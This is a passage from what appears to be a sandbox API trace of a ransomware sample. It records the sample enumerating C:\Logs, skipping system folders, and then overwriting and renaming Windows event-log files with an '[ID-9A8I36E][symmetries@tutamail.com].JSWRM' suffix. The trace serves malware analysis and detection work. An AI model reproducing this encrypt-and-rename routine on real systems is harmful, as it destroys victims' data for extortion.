RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0066.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0066.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0066.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0066.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0066.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ecb8 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0066.726] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0066.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.727] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cAlternateFileName="MIDCC7~1.EVT")) returned 1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2=".") returned 1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="..") returned 1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="...") returned 1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="windows") returned -1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="recovery") returned -1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="perflogs") returned -1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="documents and settings") returned 1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="system volume information") returned -1 [0066.727] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpString2="msocache") returned -1 [0066.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0066.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0066.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0066.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchWideChar=82, lpMultiByteStr=0x232ce8, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpUsedDefaultChar=0x0) returned 82 [0066.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0066.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0066.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0066.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0066.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchWideChar=82, lpMultiByteStr=0x232d50, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", lpUsedDefaultChar=0x0) returned 82 [0066.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0066.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0066.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0066.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x21fab8 [0066.727] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.727] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.728] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.728] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.734] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.734] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.735] CloseHandle (hObject=0x450) returned 1 [0066.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1f1c60 [0066.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0066.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0066.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x23b278 [0066.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0066.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b278 | out: hHeap=0x1e0000) returned 1 [0066.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.779] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0066.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f1c60 | out: hHeap=0x1e0000) returned 1 [0066.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21fab8 | out: hHeap=0x1e0000) returned 1 [0066.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0066.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0066.780] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cAlternateFileName="MI7771~1.EVT")) returned 1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2=".") returned 1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="..") returned 1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="...") returned 1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="windows") returned -1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="recovery") returned -1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="perflogs") returned -1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="documents and settings") returned 1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="system volume information") returned -1 [0066.780] lstrcmpiW (lpString1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpString2="msocache") returned -1 [0066.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0066.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0066.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0066.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchWideChar=72, lpMultiByteStr=0x22c7f8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpUsedDefaultChar=0x0) returned 72 [0066.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0066.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0066.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0066.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0066.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchWideChar=72, lpMultiByteStr=0x22c118, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", lpUsedDefaultChar=0x0) returned 72 [0066.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0066.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0066.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0066.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0066.781] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.781] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=1052672) returned 1 [0066.782] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2491b8 [0066.782] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0066.794] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.794] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0066.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.795] CloseHandle (hObject=0x450) returned 1 [0066.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0066.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0066.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0066.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0066.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0066.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0066.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x1f19f0 [0066.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0066.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.882] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0066.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0066.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0066.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0066.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0066.883] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cAlternateFileName="MI4667~1.EVT")) returned 1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2=".") returned 1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="..") returned 1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="...") returned 1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="windows") returned -1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="recovery") returned -1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="perflogs") returned -1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="documents and settings") returned 1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="system volume information") returned -1 [0066.883] lstrcmpiW (lpString1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpString2="msocache") returned -1 [0066.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0066.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0066.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0066.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchWideChar=57, lpMultiByteStr=0x20e268, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpUsedDefaultChar=0x0) returned 57 [0066.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0066.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0066.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0066.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0066.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchWideChar=57, lpMultiByteStr=0x20e418, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", lpUsedDefaultChar=0x0) returned 57 [0066.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0066.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0066.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0066.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 